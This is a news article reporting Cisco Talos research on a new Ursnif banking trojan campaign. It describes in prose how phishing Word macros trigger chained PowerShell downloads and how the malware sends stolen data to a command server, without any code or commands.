This old trojan learns new tricks in its latest banking info and password-stealing campaign

This banking trojan has a long history, but it's still going strong - and still being updated.
Written by Danny Palmer, Senior Writer

An infamous form of banking trojan malware with a history going back over a decade has been updated with additional infection techniques as part of a new campaign targeting financial data and passwords.

Ursnif is one of the most popular families of Windows banking trojans deployed by cyber criminals and the code behind it has been active in one form or another since at least 2007 when it first emerged in the Gozi banking trojan.

Gozi's source code was leaked in 2010, leading to several different versions of the malware emerging and targeting banks. Arguably the most successful versions of malware using Gozi's source-code, Ursnif is still being actively developed and deployed 12 years on from when the threat first appeared.

Uncovered by researchers at Cisco Talos, the latest Ursnif campaign is distributed in the same way as many other forms of malware — in phishing emails, containing malicious attachments. In this instance, the user is encouraged to open a Microsoft Word document, which presents them with instructions to 'enable content' to see what is inside.

This is a ploy to trick the user into enabling macros, which allows obfuscated code to be executed and ultimately leads to the system being compromised by the malware.

However, Ursnif isn't downloaded straight from the malicious document, rather the obfuscated code runs a PowerShell command, which in turn leads to a second PowerShell command that then downloads an Ursnif executable from a command and control server to the victim's AppData directory.

SEE: A winning strategy for cybersecurity (ZDNet special report) | Download the report as a PDF (TechRepublic)

By distributing the malware in this way, it makes it more difficult for the malicious activity to be spotted, increasing the chances of a successful infection as it often can't be discerned from normal traffic — although Cisco Talos uncovered the campaign after its exploit-prevention engine picked up and prevented an attack at this point.

If the execution of Ursnif gets to the AppData directory, it uses Windows Management Instrumentation Command-line (WMIC) to execute PowerShell and ultimately run the code for retrieving and injecting the malware into the system.

Following a successful installation, Ursnif makes requests to a command and control server, with the data put into a compressed CAB file prior to being exfiltrated from the machine, providing attackers with the means of stealing information, banking information, login details and more.

Ursnif is regularly updated with new attack techniques and this appears to be just the latest in a long line of changes made to the malware in order to make it more effective.

Cisco Talos has published the Indicators of Compromise for the latest version of Ursnif in their analysis of the malware.


Editorial standards